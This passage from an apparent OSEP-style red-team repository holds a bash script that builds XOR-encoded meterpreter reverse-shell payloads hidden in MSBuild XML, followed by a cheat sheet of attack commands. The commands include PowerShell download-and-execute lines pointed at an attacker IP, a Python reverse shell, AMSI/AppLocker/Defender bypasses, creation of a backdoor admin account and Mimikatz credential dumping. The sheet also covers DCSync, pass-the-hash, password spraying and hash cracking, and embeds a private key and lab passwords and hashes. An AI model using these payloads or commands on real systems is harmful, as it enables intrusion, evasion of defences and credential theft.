455 | # Audit the SQL instance 456 | Invoke-SQLAudit -Verbose -Instance SQLServer1 457 | 458 | # Privielge Esclate using powerupsql. 459 | Invoke-SQLEscalatePriv -Verbose -Instance SQLServer1 460 | 461 | # Get linked servers. 462 | Get-SQLServerLinkCrawl -Instance web06 463 | 464 | Executing Commands 465 | Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami' 466 | 467 | Get-SQLQuery -Verbose -Instance "web06.dev.final.com" -Query "EXEC sp_serveroption 'SQL03', 'rpc out', 'true';" 468 | Get-SQLQuery -Verbose -Instance "web06.dev.final.com" -Query "EXEC sp_serveroption 'SQL03', 'rpc', 'true';" 469 | 470 | 471 | 472 | 473 | ############################################## 474 | Cracking 475 | ############################################# 476 | 477 | # Cracking Net NTLMv2 HASH 478 | hashcat -m 5600 hash.txt dic.txt --force 479 | 480 | # Cracking Kerberoasting, getuserspn, tgs files 481 | hashcat -m 13100 --force 482 | john --format=krb5tgs --wordlist= 483 | 484 | # Cracking ssh private key password. 485 | /usr/share/john/ssh2john.py id_rsa.johny > sshhash.txt 486 | john sshhash.txt --wordlist=/usr/share/wordlists/rockyou.txt 487 | 488 | 489 | # Cracking Ansible 490 | ansible2john test.yml 491 | hashcat testhash.txt --force --hash-type=16900 492 | cat pw.txt | ansible-vault decrypt 493 | 494 | 495 | # Bcyrpt 496 | sudo john derbyhash.txt --wordlist=/usr/share/wordlists/rockyou.txt 497 | 498 | 499 | END 500 | 501 | 502 | 503 | 504 | 505 | cat << EOF > msf_tmp/certificate_msfvenom.pem 506 | -----BEGIN RSA PRIVATE KEY----- 507 | MIICXAIBAAKBgQDbnuWqr6QlQmf7Ly+eB08oW/1DkOvFywwD3HgJJeZir+u04BXE 508 | ahTKyLNtCBLVDrhiW8i6LkaamDquVysU72CJYEFDwQCAMjVN94F8DDNpd1I+Rpp/ 509 | AvFuJGA7WjFCrYtEBVQGy6yxQj6Y8CQNLzlVM6oLpYpZyGj727WxS80ACQIDAQAB 510 | AoGAWtMgyfDvYlVPKUr/V0xQiTFZ0Pp69wacxnAD2EyrNX7pbJkLh3oTdTWBNoMT 511 | Prdiu5KXtZ9zpXV1Nypnb7X7ZrCfNtMWOT3qEDjDX3Fy1cua2j8jwzu9yuys7RkD 512 | LpKLaleG1KLIjBkVWKZ66c9NAurtm9MmnyRVsV9h7/CAgO0CQQDuaB2r5mTLc4L+ 513 | OLNVm+DttVOU09ktusbVHa/ckYAFeqhqesBWWQMPLb5+K+9cbaKVfThpLoa0vLej 514 | e6LzSkYHAkEA69PiKEkE/G08ZXeEpqoNttdRw2RCreHkrBnFYeiR35NtqarBPkvE 515 | LE7iUwewdkUPa4Ohkumd6KjvXGs3cFGFbwJAVe5FM56ZmhOKlaNOUH8c9dEzzSMG 516 | 1srJvCs1JiVzpYXuimKwTO9MgP4V+VhQsFn8DjHSUWcpup+C+XQo6dRNpQJAVhAM 517 | T+FeBXUj/m+gpGYY/SoVN7ZmMyjmF/yLsRB789jMw4eCYGasH/Nl2yFKP88yMm1m 518 | UMQbEaZdPCAQqlfF1wJBAMSxs1DVQoIUDnNCq+ajVWIVzHaoKxsVpf1Wfc3PNT5u 519 | WZ+Fw7KdOyasjHYCVmBYTvbi5Lkw8wqIUX69RtrZVOY= 520 | -----END RSA PRIVATE KEY----- 521 | -----BEGIN CERTIFICATE----- 522 | MIICSTCCAbKgAwIBAgIJBaShWvkcA8RmMA0GCSqGSIb3DQEBCwUAME4xMTAvBgNV 523 | BAsMKE5vIFNOSSBwcm92aWRlZDsgcGxlYXNlIGZpeCB5b3VyIGNsaWVudC4xGTAX 524 | BgNVBAMTEGludmFsaWQyLmludmFsaWQwHhcNMTUwMTAxMDAwMDAwWhcNMzAwMTAx 525 | MDAwMDAwWjBOMTEwLwYDVQQLDChObyBTTkkgcHJvdmlkZWQ7IHBsZWFzZSBmaXgg 526 | eW91ciBjbGllbnQuMRkwFwYDVQQDExBpbnZhbGlkMi5pbnZhbGlkMIGfMA0GCSqG 527 | SIb3DQEBAQUAA4GNADCBiQKBgQDbnuWqr6QlQmf7Ly+eB08oW/1DkOvFywwD3HgJ 528 | JeZir+u04BXEahTKyLNtCBLVDrhiW8i6LkaamDquVysU72CJYEFDwQCAMjVN94F8 529 | DDNpd1I+Rpp/AvFuJGA7WjFCrYtEBVQGy6yxQj6Y8CQNLzlVM6oLpYpZyGj727Wx 530 | S80ACQIDAQABoy8wLTAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRtmAzVukvocnpw 531 | BmnDWxWvG/JbVTANBgkqhkiG9w0BAQsFAAOBgQDTdF2geFKT6rTvxcNtLTFKN+3p 532 | swsv9KcR62M917KhEmLo138mw8c+6ORXL2Mz8PEPQwsPi2L5qv/+eUG5S6klfkD4 533 | 5/HqJEjVf0A6rH2HXIuzGpR0klGzYbUu9LUFCPUMiCtyblx3pmup7+2JLPXyZe/Q 534 | 7g8YVuWjBlakDDkgKw== 535 | -----END CERTIFICATE----- 536 | EOF 537 | 538 | 539 | 540 | cat << EOF > msf_tmp/msf2.py 541 | import argparse 542 | import logging 543 | import os 544 | import subprocess 545 | 546 | def msfVenom(command, choosenPayload, ext): 547 | finalCommand = "msfvenom " + command 548 | print("Paylaod Generator: " + choosenPayload.split("/")[-1] + ":" + ext +"\n" + finalCommand) 549 | logging.debug("Executing msfvenom : %s \n", finalCommand) 550 | msf = subprocess.run([finalCommand], shell = True, capture_output=True) 551 | 552 | if (ext != "raw"): 553 | # remove \r\n charachter at the end 554 | cleanEnding = msf.stdout.rstrip() 555 | 556 | # remove b' in the start - converting to python string 557 | convertToString = cleanEnding.decode() 558 | logging.debug(convertToString) 559 | msfConsole = open("msf_tmp/" + choosenPayload.split("/")[-1] + "." + ext, "w") 560 | msfConsole.write(convertToString) 561 | msfConsole.close() 562 | 563 | 564 | def test_asif(payload, lhost, lport, ext, ssl): 565 | # get the current directory 566 | currentDirectory = os.getcwd() + "/" 567 | certPath = currentDirectory + "msf_tmp/certificate_msfvenom.pem" 568 | 569 | if ssl == 0: 570 | if not "raw" in ext: 571 | command = "-p " + payload + " LHOST=" + lhost + " LPORT=" + str(lport) + " -f " + ext 572 | print("\nListener: " + payload.split("/")[-1]) 573 | print("msfconsole -x \"use exploit/multi/handler; set payload %s; set lhost %s; set lport %s; exploit -j\" \n" % (payload, lhost, lport)) 574 | else: 575 | command = "-p " + payload + " LHOST=" + lhost + " LPORT=" + str(lport) + " -f " + ext + " -o " + currentDirectory + "msf_tmp/" + payload.split("/")[-1] + ".raw" 576 | else: 577 | 578 | if not "raw" in ext: 579 | command = "-p " + payload + " LHOST=" + lhost + " LPORT=" + str(lport) + " -f " + ext + " StagerVerifySSLCert=true " + "handlersslcert=" + certPath 580 | print("\nListener: " + payload.split("/")[-1]) 581 | print("msfconsole -x \"use exploit/multi/handler; set payload %s; set lhost %s; set lport %s; set StagerVerifySSLCert true; set handlersslcert %s; exploit -j\" \n" % (payload, lhost, lport, certPath)) 582 | else: 583 | command = "-p " + payload + " LHOST=" + lhost + " LPORT=" + str(lport) + " -f " + ext + " StagerVerifySSLCert=true " + "handlersslcert=" + certPath + " -o " + currentDirectory + "msf_tmp/" + payload.split("/")[-1] + ".raw" 584 | msfVenom(command, payload, ext) 585 | 586 | 587 | def main(): 588 | parser = argparse.ArgumentParser() 589 | parser.add_argument("--ip", help="Enter attacker machine IP (default taken from tun0") 590 | parser.add_argument("--port", help="Enter attacker machine Port (default: 443)", type=int) 591 | parser.add_argument("--verbose", help="increase output verbosity", action="store_true") 592 | parser.add_argument("--filetype", help="Enter payload type e.g ps1, csharp") 593 | parser.add_argument("--payload", help="Enter payload") 594 | parser.add_argument("--ssl", help="Enable ssl", type=int) 595 | args = parser.parse_args() 596 | 597 | if args.verbose: 598 | logging.basicConfig(level=logging.DEBUG, format='%(message)s') 599 | else: 600 | logging.basicConfig(level=logging.INFO, format='%(message)s') 601 | 602 | 603 | test_asif(args.payload, args.ip, args.port, args.filetype, args.ssl) 604 | 605 | if __name__ == "__main__": 606 | main() 607 | EOF 608 | 609 | cat << EOF > xor.py 610 | 611 | import argparse 612 | from ast import Bytes 613 | from collections import namedtuple 614 | import sys 615 | import ctypes 616 | 617 | 618 | def format_sc(sc): 619 | """Format the shellcode for pasting in C/C++, C#, Java, or Visual Basic projects. 620 | Takes shellcode as bytes, returns formatted bytes. 621 | """ 622 | 623 | sc = ["{0:#0{1}x}".format(int(x),4) for x in sc] 624 | 625 | CodeFormat = namedtuple('CodeFormat', 'open close heading items_per_line func') 626 | 627 | cf = CodeFormat(open='{\n', close='\n};', heading='byte[] shellcode = ', items_per_line=12, func=None) 628 | 629 | if cf.func: 630 | sc = cf.func 631 | 632 | iterations = (len(sc) // cf.items_per_line) if len(sc) % cf.items_per_line == 0 else (len(sc) // cf.items_per_line + 1) 633 | 634 | iteration = 0 635 | index = [0, cf.items_per_line] 636 | lines = [] 637 | 638 | while iteration < iterations: 639 | line = ', '.join(sc[index[0]:index[1]]) 640 | lines.append(line) 641 | index[0] = index[1] 642 | index[1] = index[1] + cf.items_per_line 643 | iteration += 1 644 | 645 | sc = ',\n'.join(lines) 646 | sc = cf.heading + cf.open + sc + cf.close 647 | 648 | return sc.encode() 649 | 650 | parser = argparse.ArgumentParser() 651 | parser.add_argument('-i', '--inputfile', 652 | help='File containing shellcode or read from ') 653 | 654 | parser.add_argument('-o', '--outputfile', 655 | help='Output file name') 656 | 657 | 658 | args = parser.parse_args() 659 | 660 | filename = args.inputfile 661 | 662 | with open(filename,"rb") as f: 663 | buff = f.read() 664 | 665 | def xor(buff): 666 | encoded = [None] * len(buff) 667 | for i in range(0,len(buff)): 668 | encoded[i] = ((( buff[i] + 3) ^ 0xAA) & 0xFF) 669 | 670 | 671 | return encoded 672 | 673 | e_buff = xor(buff) 674 | 675 | 676 | # //encoded[i] = (byte)((((uint) buf[i] + 3) ^ 0xAA) & 0xFF); //Encrypter 677 | # encoded[i] = (byte)((((uint)buf[i] ^ 0xAA) - 3) & 0xFF); //Decrypter 678 | output = args.outputfile 679 | with open(output,"wb") as of: 680 | of.write(format_sc(e_buff)) 681 | 682 | 683 | EOF 684 | 685 | 686 | 687 | ####################################### 688 | # Create XML Payload with Encrypted (XOR) shellcode 689 | # Globals: 690 | # None 691 | # Arguments: 692 | # None 693 | # Outputs: 694 | # Insert the xor shellcode in the XML and output that to a file 695 | ####################################### 696 | 697 | create_xml_payload(){ 698 | echo -e "\n" 699 | echo "-------------XML_Payloard------------" 700 | echo -e "\n" 701 | # bash xml_payload_gen/xml_gen.sh reverse_winhttps.raw 702 | # bash xml_payload_gen/xml_gen.sh reverse_https.raw 703 | # bash xml_payload_gen/xml_gen.sh reverse_tcp.raw 704 | 705 | 706 | # Name of the output directory to which we want to save our final XML payload 707 | # after modification 708 | OUTFILE="$current_dir/../xml/" 709 | 710 | # Location of the msf generated files 711 | INFILE="$current_dir/msf_tmp/" 712 | 713 | 714 | # Execute the python xor script on the msf payload and output encoded payload (xored) 715 | # in the same directory with the name encoded_.raw 716 | python3 xor.py -i $INFILE$1 -o $INFILE"encoded_$1" 717 | 718 | # Take the encoded payload output generated by the python xor tool and add it to the xml payload 719 | shellcode=$(cat $INFILE"encoded_$1") 720 | 721 | 722 | # The XML payload template - it have the shellcode in it $shellcode 723 | 724 | cat << EOF > $OUTFILE$1 725 | 726 | 727 | 728 | 729 | 730 | 731 | 732 | 733 | 734 | 738 | 739 | 740 | 741 | 798 | 799 | 800 | 801 | 802 | EOF 803 | } 804 | 805 | 806 | 807 | ####################################### 808 | # Generate metasploit payloads 809 | # Globals: 810 | # None 811 | # Arguments: 812 | # None 813 | # Outputs: 814 | # Write three different format files (ps1, raw, csharp) to msf_tmp/ for each payload 815 | ####################################### 816 | 817 | callMsfScript(){ 818 | echo -e "\n" 819 | echo ".........................................MSF CONSOLE..................................................." 820 | echo -e "\n" 821 | #python3 msf_tmp/msf2.py --payload "windows/x64/meterpreter/reverse_https" --ip $IP --port 443 --filetype ps1 --ssl 1 822 | python3 msf_tmp/msf2.py --payload "windows/x64/meterpreter/reverse_https" --ip $IP --port 443 --filetype raw --ssl 1 823 | 824 | #python3 msf_tmp/msf2.py --payload "windows/x64/meterpreter/reverse_tcp" --ip $IP --port 443 --filetype ps1 --ssl 0 825 | python3 msf_tmp/msf2.py --payload "windows/x64/meterpreter/reverse_tcp" --ip $IP --port 443 --filetype raw --ssl 0 826 | 827 | #python3 msf_tmp/msf2.py --payload "windows/x64/meterpreter/reverse_winhttps" --ip $IP --port 443 --filetype ps1 --ssl 1 828 | #python3 msf_tmp/msf2.py --payload "windows/x64/meterpreter/reverse_winhttps" --ip $IP --port 443 --filetype raw --ssl 1 829 | 830 | # Execute the XOR script and generate the XML payloads 831 | create_xml_payload "reverse_https.raw" 832 | create_xml_payload "reverse_tcp.raw" 833 | # create_xml_payload "reverse_winhttps.raw" 834 | } 835 | 836 | 837 | 838 | 839 | # Execute the msfvenom python script 840 | callMsfScript $IP 841 | -------------------------------------------------------------------------------- /kali-generator/commands.txt: -------------------------------------------------------------------------------- 1 | ################################################ 2 | Online Tools 3 | ################################################ 4 | https://www.revshells.com/ 5 | https://raikia.com/tool-powershell-encoder/ 6 | https://www.jackson-t.ca/runtime-exec-payloads.html 7 | https://lolbas-project.github.io/ 8 | https://gtfobins.github.io/ 9 | https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/ 10 | https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a (Kerberos) 11 | 12 | # Color the text 13 | tput setaf 3;cat commands.txt 14 | ################################################ 15 | Client side attack 16 | ################################################ 17 | sendemail -f attacker@email.com -t vactim@email.com -u attacker -m attackerpass -s x.x.x.x:25 -vvv -a resume.doc 18 | 19 | ############### 20 | Fix the bugs 21 | ############## 22 | Invoke-Command -ComputerName dc02 -ScriptBlock {ipconfig} 23 | 24 | ################################################ 25 | Information Gathering 26 | ################################################ 27 | nmap -f -oG victim.com.nmap_quick victim.com 28 | nmap --open -Pn -p - -sV -sC -T4 -oA victim.com.nmap_full --open victim.com 29 | nmap -p0- -v -A -T4 -oA victim.com.nmap_full_aggresive 192.168.49.57 30 | 31 | # Proof 32 | hostname & type c:\Users\Administrator\Desktop\proof.txt & ipconfig 33 | # Windows 34 | echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 35 | 36 | # Linux 37 | echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " " 38 | 39 | ############################################### 40 | tty shell Update 41 | ############################################### 42 | python -c 'import pty; pty.spawn("/bin/bash")' 43 | Ctrl+z 44 | stty raw -echo; fg 45 | reset 46 | export SHELL=bash 47 | export TERM=xterm-256color 48 | 49 | ################################################ 50 | Initial Shell (nc_port:446, python_port:4242) 51 | ################################################ 52 | 53 | powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/nc.txt');" 54 | python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.49.57,4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 55 | 56 | 57 | -------Meter_preter------------------ 58 | cmd.exe /c powershell wget http://192.168.49.57/Verified/new/payload.xml -O C:\ProgramData\payload.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\ProgramData\payload.xml 59 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/bad.ps1') | IEX 60 | 61 | ----------Start Powershell------------------ 62 | powershell.exe -nop -ep bypass 63 | 64 | ---Powershell_repal-------- 65 | curl -o powershell-repl.csproj http://192.168.49.57/Verified/xml/powershell-repl.csproj && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe powershell-repl.csproj 66 | 67 | 68 | 69 | ################################################ 70 | Bypass_AV_AMSI_Constrained_MODE_APPLOCKER 71 | ################################################ 72 | 73 | ----------Constrained_mode------------------ 74 | $ExecutionContext.SessionState.LanguageMode 75 | wget http://10.10.14.105/Verified/bin/bypass-clm.exe -o C:\ProgramData\bypass-clm.exe --> exe not present. 76 | 77 | ----------AMSI BYPASS-------------- 78 | powershell.exe -nop -ep bypass 79 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/amsi-bypass.txt') | IEX 80 | 81 | ----------Applocker Bypass----------- 82 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\ProgramData\bypass-clm.exe 83 | 84 | ---------Disable Antivirus------------ 85 | Set-Mppreference -disablerealtimemonitoring 1 86 | 87 | --------Disable Restricted_mode------ 88 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 89 | 90 | 91 | ############################################### 92 | Privielge Escalation 93 | ############################################### 94 | PrintSpoofer.exe -i -c cmd.exe 95 | 96 | 97 | 98 | ################################################ 99 | Weaponized tools. 100 | ################################################ 101 | 102 | curl -o ADCollector.exe http://192.168.49.57/Verified/bin/ADCollector.exe 103 | curl -o nmap.zip http://192.168.49.57/Verified/nmap/nmap-7.92-win32.zip 104 | curl -o Mimi_new.zip http://192.168.49.57/Verified/compressedfile/Mimi_new.zip 105 | curl -o npcap.exe http://192.168.49.57/Verified/nmap/npcap-1.60.exe 106 | curl -o PsExec64.exe http://192.168.49.57/Verified/bin/PsExec64.exe 107 | curl -o Rubeus.exe http://192.168.49.57/Verified/bin/Rubeus.exe 108 | curl -o chisel.exe http://192.168.49.57/Verified/bin/chisel.exe 109 | curl -o SharpUp.exe http://192.168.49.57/Verified/bin/SharpUp.exe 110 | curl -o SpoolSample.exe http://192.168.49.57/Verified/bin/SpoolSample.exe 111 | curl -o SharpHound.exe http://192.168.49.57/Verified/bin/SharpHound.exe 112 | curl -o DAFT.exe http://192.168.49.57/Verified/SQLAUDIT/DAFT.exe 113 | 114 | v#TODO 115 | curl -o SQLServerClient.exe http://192.168.49.57/Verified/bin/SQLServerClient.exe 116 | curl -o PrintSpooferNet.exe http://192.168.49.57/Verified/bin/PrintSpooferNet.exe 117 | curl -o katzimim.exe http://192.168.49.57/Verified/bin/katzimim.exe 118 | curl -o MiniDump.exe http://192.168.49.57/Verified/bin/MiniDump.exe 119 | curl -o HollowEvade.exe http://192.168.49.57/Verified/bin/HollowEvade.exe 120 | curl -o FilelessLateralMovement.exe http://192.168.49.57/Verified/bin/FilelessLateralMovement.exe 121 | 122 | 123 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/SharpHound.txt') | IEX; Invoke-BloodHound -CollectionMethod All 124 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/PowerUp.txt') | IEX; Invoke-AllChecks | Out-File -FilePath ~\powerup.txt 125 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/Invoke-Mimikatz.txt') | IEX 126 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/HostRecon.txt') | IEX 127 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/LAPSToolkit.txt') | IEX 128 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/PowerView.txt') | IEX 129 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/PowerUpSQL/PowerUpSQL.txt') | IEX 130 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/Powermad.txt') | IEX 131 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/powerviewv1.txt') | IEX 132 | 133 | $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://192.168.49.57/Verified/bin/winPEASx64_ofs.exe' -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main('log') 134 | 135 | $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://192.168.49.57/Verified/bin/Rubeus.exe' -UseBasicParsing | Select-Object -ExpandProperty Content)); [Rubeus.Program]::Main("dump".Split()) 136 | 137 | #TODO 138 | Invoke-ShareFinder 139 | (New-Object System.Net.WebClient).DownloadString('http://192.168.49.57/Verified/ps/nice-function.txt') | IEX; Nice-Function -dd84f627e34042a19d0e69bbfb56125d $buf 140 | 141 | 142 | 143 | ################################################ 144 | Lateral_Moment_commands 145 | ################################################ 146 | psexec.py : 445 147 | dcomexec.py : 135,445,(49751 dcom) 148 | smbexec.py : 445 149 | wmiexec.py : 135,445,(50911 winmgmt) 150 | atexec.py : 445 151 | crackmapexec 152 | 153 | Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {type C:\Users\Administrator\Desktop\proof.txt} 154 | 155 | evil-winrm -i 192.168.57.121 -u 'infinity\ted' -p 'fdsfYRTYd455dD' 156 | evil-winrm -i 192.168.57.121 -u 'infinity\ted' -H 'e929e69f7c290222be87968263a9282e' 157 | 158 | ###################### 159 | Enable RDP 160 | ###################### 161 | # Add User 162 | net user evilme evilme /add 163 | net localgroup "Administrators" evilme /add 164 | net group ""Enterprise Admins"" offsec /add /domain 165 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 166 | 167 | # Allow Remote Access 168 | netsh firewall set opmode disable 169 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 170 | 171 | 172 | 173 | %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe 174 | .\Rubeus.exe monitor /interval:1 /nowrap 175 | .\PsExec.exe -i -s -d powershell 176 | .\SpoolSample.exe dc02.dmzacbank.com appsrv09.dmzacbank.com 177 | 178 | 179 | mimikat# 180 | privilege::debug 181 | !processprotect /process:lsass.exe /remove 182 | sekurlsa::logonpasswords 183 | lsadump::dcsync /all /csv 184 | 185 | 186 | #kekeo 187 | tgt::delgate 188 | 189 | 190 | # Pass-The-Hash and or Restricted Admin login 191 | // if you want to connect to RDP using mimikatz 192 | sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" 193 | 194 | // if you want to connect to target machine using mimikatz powershell 195 | mimikatz.exe "sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe" 196 | 197 | // if you want to connect to target machine using xfreedesktop 198 | Enter-PSSession -Computer 199 | New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 200 | 201 | xfreerdp +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8 /u: /pth: /v: 202 | xfreerdp /d: /u: /pth:HASH /v:HOST /cert-ignore -dynamic-resolution /drive:Verified,/path/to/Verified /timeout:60000 203 | 204 | 205 | ################################################ 206 | Blood-Hound Queries 207 | ################################################ 208 | Return all computers. 209 | MATCH (u:Computer) return u.name 210 | 211 | Return all nodes with outgoing permision. 212 | MATCH (n)-[r]->(g) where r.isacl = true return distinct(n.name) 213 | 214 | 215 | 216 | #################################################################################### 217 | Attacking from Linux 218 | #################################################################################### 219 | 220 | ================ 221 | Turn of automatic date and time 222 | ================ 223 | timedatectl set-ntp 0 224 | ntpdate 192.168.57.5 225 | 226 | 227 | ############################# 228 | Crackmap 229 | ############################# 230 | # Generate a list of relayable hosts (SMB Signing disabled) 231 | crackmapexec smb --kdcHost 192.168.57.5 192.168.57.0/24 --gen-relay-list relay.txt 232 | 233 | # PSEXEC 234 | crackmapexec smb 192.168.57.121 -d infinity -u 'ted' -H ':e929e69f7c290222be87968263a9282e' -x 'whoami' 235 | 236 | # WINRM 237 | crackmapexec winrm 192.168.57.121 -d infinity -u 'ted' -H 'e929e69f7c290222be87968263a9282e' -x 'whoami' 238 | 239 | # Password_spray 240 | proxychains4 -q crackmapexec smb 172.16.57.0/24 -u 'Administrator' -d '.' -H '8388d07604009d14cbb78f7d37b9e887' 241 | 242 | ############################# 243 | pywerview 244 | ############################# 245 | 246 | # Hint: 247 | # use --hashes if you dont have passwowrd. ) 248 | # usefull: get-netdomaintrust, get-netgroupmember, get-netshare, get-netfileserver, get-netsubnet 249 | 250 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netdomain -u 'ted' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' 251 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netdomaintrust -u 'ted' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' 252 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netcomputer -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' 253 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netcomputer -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' --unconstrained 254 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netcomputer -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' -spn '*' 255 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netgroup -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' | awk 'NF' > groupts.txt 256 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netgroupmember -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' --groupname PswReaders 257 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netuser -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' 258 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netuser -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' --unconstrained 259 | python3.9 /mnt/hgfs/Shared_Folder/Yo/lab1/pywerview/pywerview.py get-netuser -u 'ted' -d 'infinity.com' -t 'dc03.infinity.com' -p 'fdsfYRTYd455dD' --spn 260 | 261 | 262 | # Compare Groups with the default groups and find the difff 263 | PATH : /mnt/hgfs/Shared_Folder/Verified/default_data/groups.txt 264 | cat groupts.txt | anew /mnt/hgfs/Shared_Folder/Verified/default_data/groups.txt 265 | 266 | 267 | 268 | ########################## 269 | Convert Ticket to kerbi formate. 270 | ######################## 271 | # Hint: If TGT ticket is not working please try using kekeo to get ticket tgt::delgate (This solved the problem of null sessions) 272 | 273 | cat /tmp/krb5cc_742201114_vjlDum |base64 -w 0 274 | echo '======' | base64 -d > user.ccache 275 | ticketConverter.py user.ccache user.kirbi 276 | mimikataz# 277 | kerberos::ptt user.kirbi 278 | Enter-PSSession -ComputerName web01 279 | 280 | ---From windows to linux 281 | [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) 282 | 283 | 284 | ########################################## 285 | IMPACKET 286 | ########################################## 287 | # Hint: 288 | # replace -hashes with -k -no-pass (if kerberos) 289 | # IMPORTANT NOTE: DOMAIN NAME SHOULD NOT BE RETURN IN SINGLE QOUTE ELSE IT IS CASE SENSITIVE AND YOU WILL GET 290 | # USE /etc/resolve.conf #Because kerberos is bitch. 291 | 292 | # PSEXEC (Pass the Hash) 293 | impacket-psexec -hashes ":e929e69f7c290222be87968263a9282e" "infinity/ted"@192.168.57.121 294 | impacket-psexec -no-pass -k PROD.CORP1.COM/offsec@APPSRV01.PROD.CORP1.COM -dc-ip 192.168.57.70 295 | 296 | # WMIEXEC (Pass the Hash) 297 | impacket-wmiexec -hashes ":e929e69f7c290222be87968263a9282e" "infinity/ted"@192.168.57.121 298 | 299 | # NTLMRELAYX (NTLMV2 RELAY) 300 | impacket-ntlmrelayx.py -smb2support -t 10.10.10.1 -c 'whoami /all' -debug 301 | 302 | # Convert Ticket to kerbi formate. 303 | python ticket_converter.py ticket.kirbi ticket.ccache 304 | kirbi2ccache ticket.kirbi wow.ccache 305 | export KRB5CCNAME= 306 | 307 | # DCSYNC 308 | impacket-secretsdump -just-dc 'infinity/pete@192.168.57.120' -hashes ":00f50c4047ef95b6349492e3eb0a1b41" 309 | 310 | # Normal pc secrets dump 311 | impacket-secretsdump 'infinity/pete@192.168.57.121' -hashes ":00f50c4047ef95b6349492e3eb0a1b41" 312 | 313 | # Get user emails 314 | impacket-GetADUsers -no-pass -k CORP1.COM/offsec -dc-ip 192.168.57.5 315 | 316 | # Kerberoasting / relay Attacks 317 | impacket-GetUserSPNs -no-pass -k CORP1.COM/offsec -dc-ip 192.168.57.5 -outputfile lab1/output_tgs 318 | 319 | 320 | # MSSQL CONNECT & SMB RELAY ATTACK 321 | impacket-mssqlclient -no-pass -k corp1.com/offsec@appsrv01.corp1.com 322 | impacket-mssqlclient -no-pass -k corp1.com/offsec@dc01.corp1.com 323 | 324 | 325 | ########################################### 326 | # MSSQL - Queries 327 | ########################################## 328 | # https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/MSSQL/Program.cs 329 | # use db "master" 330 | 331 | # Enumerate login info 332 | SELECT SYSTEM_USER; 333 | 334 | # Enumerate database username. 335 | SELECT USER_NAME(); 336 | 337 